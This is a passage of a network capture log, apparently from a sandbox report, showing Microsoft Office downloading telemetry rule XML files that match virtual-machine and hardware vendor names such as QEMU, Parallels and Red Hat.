                                                                                                                                                                                                            76192.168.2.44990413.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:24 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:24 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:24 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                            x-ms-request-id: c14060eb-d01e-007a-6e7d-3bf38c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032724Z-174c587ffdfgcs66hC1TEB69cs00000000rg000000009znp
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:24 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            77192.168.2.44990613.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:25 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:26 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                            x-ms-request-id: 0ecd932e-001e-0066-5d4b-3c561e000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032726Z-15b8b599d88s6mj9hC1TEBur3000000000qg000000008u1e
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:26 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            78192.168.2.44990713.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:26 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:26 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                            x-ms-request-id: d8899c23-b01e-003e-234e-3c8e41000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032726Z-15b8b599d88wk8w4hC1TEB14b800000000z0000000003ttm
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:26 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            79192.168.2.44990913.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:26 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:26 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                            x-ms-request-id: 6fd3b960-801e-00ac-6c64-3bfd65000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032726Z-178bfbc474bpscmfhC1NYCfc2c00000000x000000000mt05
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:26 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            80192.168.2.44990813.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:26 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:26 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                            x-ms-request-id: 8d96ff29-301e-0020-36b1-3b6299000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032726Z-15b8b599d882l6clhC1TEBxd5c00000000pg00000000g58w
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:26 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            81192.168.2.44991013.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:26 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:26 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                            x-ms-request-id: 5f785e56-701e-0053-0854-3c3a0a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032726Z-178bfbc474bwlrhlhC1NYCy3kg00000002bg00000000ez1x
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:26 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            82192.168.2.44991113.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:27 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:28 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                            x-ms-request-id: e2ff131b-f01e-0085-7676-3b88ea000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032728Z-174c587ffdfp4vpjhC1TEBybqw00000000y0000000003dyp
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:28 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            83192.168.2.44991213.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:28 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:28 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 432
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                            x-ms-request-id: 23cbbb45-601e-0084-4e3d-3c6b3f000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032728Z-178bfbc474bq2pr7hC1NYCkfgg00000002g000000000ee2a
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:28 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            84192.168.2.44991313.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:28 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:28 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                            x-ms-request-id: fafd7d00-e01e-00aa-3a63-3bceda000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032728Z-178bfbc474bwh9gmhC1NYCy3rs00000002bg00000000px5f
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:28 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            85192.168.2.44991413.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:28 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:28 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                            x-ms-request-id: 3d26e0c5-e01e-0020-6638-3cde90000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032728Z-178bfbc474bnwsh4hC1NYC2ubs00000002cg00000000kvc4
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
